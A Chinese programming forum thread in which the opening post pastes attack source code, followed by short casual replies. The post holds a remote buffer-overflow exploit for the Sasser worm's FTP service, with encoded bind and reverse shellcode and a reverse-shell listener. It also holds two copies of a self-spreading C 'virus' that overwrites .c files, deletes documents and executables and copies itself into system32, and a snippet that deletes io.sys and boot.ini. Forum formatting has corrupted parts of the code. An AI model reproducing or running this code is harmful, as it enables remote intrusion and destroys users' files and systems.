| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 1894 人关注过本帖, 1 人收藏
标题:在自己电脑上运行必挂无疑(c语言源码)
只看楼主 加入收藏
草坪
Rank: 1
等 级:新手上路
帖 子:12
专家分:1
注 册:2010-10-30
结帖率:50%
收藏(1)
已结贴  问题点数:20 回复次数:25 
在自己电脑上运行必挂无疑(c语言源码)
/*
#i nclude <stdio.h>   
#i nclude <strings.h>   
#i nclude <signal.h>   
#i nclude <netinet/in.h>   
#i nclude <netdb.h>   
#define NORM "\033[00;00m"   
#define GREEN "\033[01;32m"   
#define YELL "\033[01;33m"   
#define RED "\033[01;31m"   
#define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.3 for " RED "sasser.x" NORM   
#define fatal(x) { perror(x); exit(1); }   
#define default_port 5554   
struct { char *os; long goreg; long gpa; long lla;}   
targets[] = {   
// { "os", go ebx or pop pop ret, GetProcAd ptr, LoadLib ptr },   
{ "wXP SP1 all", 0x77C0BF21, 0x77be10CC, 0x77be10D0 },   
{ "w2k SP4 all", 0x7801D081, 0x780320cc, 0x780320d0 },   
}, tsz;   
unsigned char bsh[]={   
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA,   
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,   
0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,   
0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,   
0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,   
0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36,   
0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,   
0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8,   
0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xAE,   
0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,   
0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,   
0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,   
0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,   
0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,   
0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,   
0xC8,0x21,0x0E   
};   
unsigned char rsh[]={   
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA,   
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,   
0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,   
0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,   
0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,   
0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,   
0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x89,   
0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,   
0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,   
0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,   
0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,   
0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,   
0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E   
};   
char verbose=0;   
void setoff(long GPA, long LLA) {   
int gpa=GPA^0xdededede, lla=LLA^0xdededede;   
memcpy(bsh+0x1d,&gpa,4);   
memcpy(bsh+0x2e,&lla,4);   
memcpy(rsh+0x1d,&gpa,4);   
memcpy(rsh+0x2e,&lla,4);   
}   
void usage(char *argv0) {   
int i;   
printf("%s -d <host/ip> [opts]\n\n",argv0);   
printf("Options:\n");   
printf(" -h undocumented\n");   
printf(" -p <port> to connect to [default: %u]\n",default_port);   
printf(" -s <'bind'/'rev'> shellcode type [default: bind]\n");   
printf(" -P <port> for the shellcode [default: 530]\n");   
printf(" -H <host/ip> for the reverse shellcode\n");   
printf(" -L setup the listener for the reverse shell\n");   
printf(" -t <target type> [default 0]; choose below\n\n");   
printf("Types:\n");   
for(i = 0; i < sizeof(targets)/sizeof(tsz); i++)   
printf(" %d %s\t[0x%.8x]\n", i, targets.os, targets.goreg);   
exit(1);   
}   
void shell(int s) {   
char buff[4096];   
int retval;   
fd_set fds;   
printf("[+] connected!\n\n");   
for (;;) {   
FD_ZERO(&fds);   
FD_SET(0,&fds);   
FD_SET(s,&fds);   
if (select(s+1, &fds, NULL, NULL, NULL) < 0)   
fatal("[-] shell.select()");   
if (FD_ISSET(0,&fds)) {   
if ((retval = read(1,buff,4096)) < 1)   
fatal("[-] shell.recv(stdin)");   
send(s,buff,retval,0);   
}   
if (FD_ISSET(s,&fds)) {   
if ((retval = recv(s,buff,4096,0)) < 1)   
fatal("[-] shell.recv(socket)");   
write(1,buff,retval);   
}   
}   
}   
void callback(short port) {   
struct sockaddr_in sin;   
int s,slen=16;   
sin.sin_family = 2;   
sin.sin_addr.s_addr = 0;   
sin.sin_port = htons(port);   
s=socket(2,1,6);   
if ( bind(s,(struct sockaddr *)&sin, 16) ) {   
kill(getppid(),SIGKILL);   
fatal("[-] shell.bind");   
}   
listen(s,1);   
s=accept(s,(struct sockaddr *)&sin,&slen);   
shell(s);   
printf("crap\n");   
}   
int main(int argc, char **argv, char **env) {   
struct sockaddr_in sin;   
struct hostent *he;   
char *host; int port=default_port;   
char *Host; int Port=5300; char bindopt=1;   
int i,s,pid=0,rip;   
char *buff;   
int type=0;   
char *jmp[]=;   
printf(BANNER "\n");   
if (argc==1)   
usage(argv[0]);   
for (i=1;i<argc;i+=2) {   
if (strlen(argv) != 2)   
usage(argv[0]);   
switch(argv[1]) {   
case 't':   
type=atoi(argv[i+1]);   
break;   
case 'd':   
host=argv[i+1];   
break;   
case 'p':   
port=atoi(argv[i+1])?:default_port;   
break;   
case 's':   
if (strstr(argv[i+1],"rev"))   
bindopt=0;   
break;   
case 'H':   
Host=argv[i+1];   
break;   
case 'P':   
Port=atoi(argv[i+1])?:5300;   
Port=Port ^ 0xdede;   
Port=(Port & 0xff) << 8 | Port >>8;   
memcpy(bsh+0x57,&Port,2);   
memcpy(rsh+0x5a,&Port,2);   
Port=Port ^ 0xdede;   
Port=(Port & 0xff) << 8 | Port >>8;   
break;   
case 'L':   
pid++; i--;   
break;   
case 'v':   
verbose++; i--;   
break;   
case 'h':   
usage(argv[0]);   
default:   
usage(argv[0]);   
}   
}   
if (verbose)   
printf("verbose!\n");   
if ((he=gethostbyname(host))==NULL)   
fatal("[-] gethostbyname()");   
sin.sin_family = 2;   
sin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);   
sin.sin_port = htons(port);   
printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port);   
if (bindopt)   
printf("[.] will try to put a bindshell on port %d.\n",Port);   
else {   
if ((he=gethostbyname(Host))==NULL)   
fatal("[-] gethostbyname() for -H");   
rip=*((long *)he->h_addr_list[0]);   
rip=rip^0xdededede;   
memcpy(rsh+0x53,&rip,4);   
if (pid) {   
printf("[.] setting up a listener on port %d.\n",Port);   
pid=fork();   
switch (pid) { case 0: callback(Port); }   
} else   
printf("[.] you should h***e a listener on %s:%d.\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),Port);   
}   
printf("[.] using type '%s'\n",targets[type].os);   
// -------------------- core   
s=socket(2,1,6);   
if (connect(s,(struct sockaddr *)&sin,16)!=0) {   
if (pid) kill(pid,SIGKILL);   
fatal("[-] connect()");   
}   
printf("[+] connected, sending exploit\n");   
buff=(char *)malloc(4096);   
bzero(buff,4096);   
sprintf(buff,"USER x\n");   
send(s,buff,strlen(buff),0);   
recv(s,buff,4095,0);   
sprintf(buff,"PASS x\n");   
send(s,buff,strlen(buff),0);   
recv(s,buff,4095,0);   
memset(buff+0000,0x90,2000);   
strncpy(buff,"PORT ",5);   
strcat(buff,"\x0a");   
memcpy(buff+272,jmp[0],2);   
memcpy(buff+276,&targets[type].goreg,4);   
memcpy(buff+280,jmp[1],5);   
setoff(targets[type].gpa, targets[type].lla);   
if (bindopt)   
memcpy(buff+300,&bsh,strlen(bsh));   
else   
memcpy(buff+300,&rsh,strlen(rsh));   
send(s,buff,strlen(buff),0);   
free(buff);   
close(s);   
// -------------------- end of core   
if (bindopt) {   
sin.sin_port = htons(Port);   
sleep(1);   
s=socket(2,1,6);   
if (connect(s,(struct sockaddr *)&sin,16)!=0)   
fatal("[-] exploit most likely failed");   
shell(s);   
}   
if (pid) wait(&pid);   
exit(0);   
}  
*/



NO 1



#include <io.h>
#include <dir.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


void copyfile(char *infile, char *outfile)
{
    FILE *in,*out;

    in = fopen(infile,"r");
    out = fopen(outfile,"w");

    while (!feof(in))
    {
        fputc(fgetc(in),out);
    }

    fclose(in);
    fclose(out);
}


void MakeRubbish()
{
    int i;   
    FILE *fp;
    char *path;
    char *NewName;
    char *disk[7] = {"A","B","C","D","E","F","G"};
    char *addtion = ":\\";

   
    for (i = 0; i<5; i++)
    {
        char tempname[] = "XXXXXX" ;

        NewName = mktemp(tempname);
        fp = fopen(NewName,"w");
        fclose(fp);
    }




    path = strcat(disk[getdisk()],addtion);

    chdir(path);

    for (i = 0; i<5; i++)
    {
        char tempname[] = "XXXXXX";

        NewName = mktemp(tempname);
        fp = fopen(NewName,"w");
        fclose(fp);
    }

}




void CreatEXE()
{
    int i;
    char *path;

    char *s[2] = {"C:\\WINDOWS\\system32\\loveworm.exe","C:\\WINDOWS\\};


    for ( i = 0; i < 2; i++)
    {
        open(s, 0x0100,0x0080);
        copyfile( "C_KILLER.C",s);

    }
}



void Remove()
{
        
    int done;
    int i;

    struct ffblk ffblk;
    char *documenttype[3] = {"*.txt","*.doc","*.exe"};
    for (i = 0; i < 3; i++)
    {
        done = findfirst(documenttype,&ffblk,2);
        while (!done)
        {
                remove(ffblk.ff_name);
                done = findnext(&ffblk);
        }
    }
}




void Breed()
{
        
    int done;

    struct ffblk ffblk;

    done = findfirst("*.c",&ffblk,2);
    while (!done)
    {
        if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 )

        {
                copyfile("C_KILLER.C",ffblk.ff_name);
        }
        done = findnext(&ffblk);
    }

}


void main()
{

        

        printf("THERE IS A VIRUS BY  XIAOKE.\n\n");

        Breed();
        Remove();
        CreatEXE();


        printf("COULD YOU TELL ME YOUR NAME?\n\n");
        printf("NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!\n\n");

        MakeRubbish();
        getchar();
        printf("IT'S ONLY A JOKE! THANK YOU!\n\n");

        clrscr();
        system("cmd");
}




NO 2


#include <io.h>
#include <dir.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


void copyfile(char *infile, char *outfile)
{
        FILE *in,*out;

        in = fopen(infile,"r");
        out = fopen(outfile,"w");

        while (!feof(in))
        {
            fputc(fgetc(in),out);
        }

        fclose(in);
        fclose(out);
}


void MakeRubbish()
{
        int i;   
        FILE *fp;
        char *path;
        char *NewName;
        char *disk[7] = {"A","B","C","D","E","F","G"};
        char *addtion = ":\\";

      
        for (i = 0; i<5; i++)
        {
            char tempname[] = "XXXXXX" ;

            NewName = mktemp(tempname);
            fp = fopen(NewName,"w");
            fclose(fp);
        }




        path = strcat(disk[getdisk()],addtion);

        chdir(path);

        for (i = 0; i<5; i++)
        {
            char tempname[] = "XXXXXX";

            NewName = mktemp(tempname);
            fp = fopen(NewName,"w");
            fclose(fp);
        }

}




void CreatEXE()
{
        int i;
        char *path;

        char *s[2] = {"C:\\WINDOWS\\system32\\loveworm.exe","C:\\WINDOWS\\};


        for ( i = 0; i < 2; i++)
        {
            open(s, 0x0100,0x0080);
            copyfile( "C_KILLER.C",s);

        }
}



void Remove()
{
        
        int done;
        int i;

        struct ffblk ffblk;
        char *documenttype[3] = {"*.txt","*.doc","*.exe"};
        for (i = 0; i < 3; i++)
        {
            done = findfirst(documenttype,&ffblk,2);
            while (!done)
            {
                    remove(ffblk.ff_name);
                    done = findnext(&ffblk);
            }
        }
}


void Breed()
{
        
        int done;

        struct ffblk ffblk;

        done = findfirst("*.c",&ffblk,2);
        while (!done)
        {
            if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 )

            {
                    copyfile("C_KILLER.C",ffblk.ff_name);
            }
            done = findnext(&ffblk);
        }

}


void main()
{

        

            printf("THERE IS A VIRUS BY      XIAOKE.\n\n");

            Breed();
            Remove();
            CreatEXE();


            printf("COULD YOU TELL ME YOUR NAME?\n\n");
            printf("NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!\n\n");

            MakeRubbish();
            getchar();
            printf("IT'S ONLY A JOKE! THANK YOU!\n\n");

            clrscr();
            system("cmd");
}





最简单的c语言病毒源程序





#include<stdlib.h>
main()
{
printf("病毒!!!!!!");

getchar();

getchar();

getchar();   

system("del c:\io.sys ");

    system("del c:\boot.ini");
}
搜索更多相关主题的帖子: c语言 long 
2011-02-10 14:16
huangapple
Rank: 10Rank: 10Rank: 10
等 级:青峰侠
帖 子:545
专家分:1790
注 册:2010-12-30
收藏
得分:1 
.

勤能补拙,熟能生巧!
2011-02-10 14:20
Alar30
Rank: 10Rank: 10Rank: 10
等 级:贵宾
威 望:10
帖 子:988
专家分:1627
注 册:2009-9-8
收藏
得分:1 
俺还是不想挂
所以纯粹看看哈。。
2011-02-10 15:47
jefffyang
Rank: 1
等 级:新手上路
帖 子:10
专家分:7
注 册:2011-2-10
收藏
得分:1 
瞄了一遍,没什么感觉
2011-02-10 15:50
じ☆ve.·°
Rank: 2
等 级:论坛游民
帖 子:52
专家分:51
注 册:2011-2-3
收藏
得分:1 
什么东西的 我好做好心理准备~~~~~~
2011-02-10 17:12
落叶深蓝色
Rank: 8Rank: 8
来 自:山东
等 级:蝙蝠侠
帖 子:319
专家分:807
注 册:2010-12-8
收藏
得分:1 
谁说一下运行结果
2011-02-10 18:58
落叶深蓝色
Rank: 8Rank: 8
来 自:山东
等 级:蝙蝠侠
帖 子:319
专家分:807
注 册:2010-12-8
收藏
得分:0 
system("del c:\io.sys ");

    system("del c:\boot.ini");
是不是删了什么东西(新手)
2011-02-10 18:59
卧龙孔明
Rank: 9Rank: 9Rank: 9
等 级:贵宾
威 望:59
帖 子:3872
专家分:684
注 册:2006-10-13
收藏
得分:1 
现在看来,这种病毒真的不能算什么病毒。
在我无知的时候,我也写过这种“病毒” = =,当时还写了几篇弱智文章,现在看起来真好笑.....
解压后运行= =.rar (23.67 KB)

这个压缩包里放的"病毒"如果要测试,请在winXP中解压运行,Killer是解毒程序,纯属娱乐,不会盗什么账号,至多让你计算机变慢-,-。(测试有风险)
真想做什么病毒,先去好好学习吧,别走我当年的路!



My Blog: www.aiexp.info
虽然我的路是从这里开始的,但是这里不再是乐土.感谢曾经影响过,引导过,帮助过我的董凯,飞燕,leeco,starwing,Rockcarry,soft_wind等等等等.别了,BCCN.
2011-02-10 19:43
qq312154421
Rank: 3Rank: 3
等 级:论坛游侠
帖 子:124
专家分:120
注 册:2010-6-7
收藏
得分:1 
看不懂啊啊啊???

勤奋不止,自强不息。
2011-02-10 19:45
vandychan
Rank: 15Rank: 15Rank: 15Rank: 15Rank: 15
等 级:贵宾
威 望:18
帖 子:2296
专家分:6418
注 册:2010-8-20
收藏
得分:1 
这代码看得晕晕的

到底是“出来混迟早要还”还是“杀人放火金腰带”?
2011-02-10 19:47
快速回复:在自己电脑上运行必挂无疑(c语言源码)
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.029482 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved